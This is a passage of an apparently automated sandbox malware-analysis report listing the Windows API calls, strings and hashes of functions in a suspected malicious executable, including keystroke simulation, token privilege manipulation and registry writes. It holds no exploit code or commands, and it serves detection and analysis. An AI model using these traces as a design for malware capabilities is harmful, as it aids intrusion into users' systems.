                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                                                        • SendMessageW.USER32 ref: 0048CD33
                                                                                        • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                                                        • SetCapture.USER32(?), ref: 0048CE69
                                                                                        • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                                                        • ReleaseCapture.USER32 ref: 0048CF00
                                                                                        • GetCursorPos.USER32(?), ref: 0048CF3A
                                                                                        • ScreenToClient.USER32(?,?), ref: 0048CF47
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                                                        • SendMessageW.USER32 ref: 0048CFD1
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                                                        • SendMessageW.USER32 ref: 0048D03D
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                                                        • GetCursorPos.USER32(?), ref: 0048D08D
                                                                                        • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                                                        • GetParent.USER32(?), ref: 0048D0BA
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                                                        • SendMessageW.USER32 ref: 0048D154
                                                                                        • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                                                        • SendMessageW.USER32 ref: 0048D22F
                                                                                        • ClientToScreen.USER32(?,?), ref: 0048D281
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$F$pbL
                                                                                        • API String ID: 3977979337-2097280626
                                                                                        • Opcode ID: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
                                                                                        • Instruction ID: aa2ec0652ddf211ac3aa7531e5acae26c7b16f0e73498be5a03c601873f34f9f
                                                                                        • Opcode Fuzzy Hash: 4af15b1d74f5ceb569f81a2242e5ab9552bfc6f03819da6794c6277fd3238044
                                                                                        • Instruction Fuzzy Hash: FE42DE74604640AFC720EF24D888EAEBBE5FF48310F140A2EF559973A1C735E855DB6A
                                                                                        Function 00416F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$_memset
                                                                                        • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                                                        • API String ID: 1357608183-1426331590
                                                                                        • Opcode ID: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                        • Instruction ID: 24ac3008a4780d7342888deeabfce4e0a58b67e9339f094d14e98286774badb8
                                                                                        • Opcode Fuzzy Hash: b28a790e45669a4902d64bf1598fd7c3bcb7bf2305bb98875f8069baf6f44106
                                                                                        • Instruction Fuzzy Hash: A193A471A002199BDB24CF58C8817EEB7B1FF48315F24815BED45AB392E7789D86CB48
                                                                                        Function 004048D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                                                        • IsIconic.USER32(?), ref: 0043D66E
                                                                                        • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                                                        • SetForegroundWindow.USER32(?), ref: 0043D685
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                                                        • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                                                        • SetForegroundWindow.USER32(?), ref: 0043D721
                                                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 4125248594-2988720461
                                                                                        • Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                        • Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
                                                                                        • Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
                                                                                        • Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9
                                                                                        Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                          • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                          • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                        • _memset.LIBCMT ref: 00458353
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                                                        • CloseHandle.KERNEL32(?), ref: 004583B6
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                                                        • GetProcessWindowStation.USER32 ref: 004583E6
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                                                          • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                          • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $default$winsta0
                                                                                        • API String ID: 2063423040-1027155976
                                                                                        • Opcode ID: 007e003301226a36e1941e8713d92a1d8206d02883a1c24a6694a0b4fadf7aa5
                                                                                        • Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
                                                                                        • Opcode Fuzzy Hash: 007e003301226a36e1941e8713d92a1d8206d02883a1c24a6694a0b4fadf7aa5
                                                                                        • Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28
                                                                                        Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                                                                        • __swprintf.LIBCMT ref: 0046C890
                                                                                        • __swprintf.LIBCMT ref: 0046C8D3
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • __swprintf.LIBCMT ref: 0046C927
                                                                                          • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                                                        • __swprintf.LIBCMT ref: 0046C975
                                                                                          • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                                                          • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                                                        • __swprintf.LIBCMT ref: 0046C9C4
                                                                                        • __swprintf.LIBCMT ref: 0046CA13
                                                                                        • __swprintf.LIBCMT ref: 0046CA62
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 3953360268-2428617273
                                                                                        • Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                                        • Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
                                                                                        • Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
                                                                                        • Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66
                                                                                        Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0046EFB6
                                                                                        • _wcscmp.LIBCMT ref: 0046EFCB
                                                                                        • _wcscmp.LIBCMT ref: 0046EFE2
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F031
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                                                        • _wcscmp.LIBCMT ref: 0046F074
                                                                                        • _wcscmp.LIBCMT ref: 0046F08B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                                                        • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        • Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                        • Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
                                                                                        • Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
                                                                                        • Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E
                                                                                        Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        • Opcode ID: d0f75a01e482a49b07148aa577a98b6e9a5d0e4f819e1f39863cc972e1e4a9db
                                                                                        • Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
                                                                                        • Opcode Fuzzy Hash: d0f75a01e482a49b07148aa577a98b6e9a5d0e4f819e1f39863cc972e1e4a9db
                                                                                        • Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89
                                                                                        Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                                                        • API String ID: 0-559809668
                                                                                        • Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                        • Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
                                                                                        • Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
                                                                                        • Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98
                                                                                        Function 0046F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0046F113
                                                                                        • _wcscmp.LIBCMT ref: 0046F128
                                                                                        • _wcscmp.LIBCMT ref: 0046F13F
                                                                                          • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F179
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                                                        • _wcscmp.LIBCMT ref: 0046F1BC
                                                                                        • _wcscmp.LIBCMT ref: 0046F1D3
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                                                        • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1824444939-438819550
                                                                                        • Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                        • Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
                                                                                        • Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
                                                                                        • Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D
                                                                                        Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                                                        • __swprintf.LIBCMT ref: 0046A231
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                                                        • _memset.LIBCMT ref: 0046A2B2
                                                                                        • _wcsncpy.LIBCMT ref: 0046A2EE
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 2733774712-3457252023
                                                                                        • Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                        • Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
                                                                                        • Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
                                                                                        • Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29
                                                                                        Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
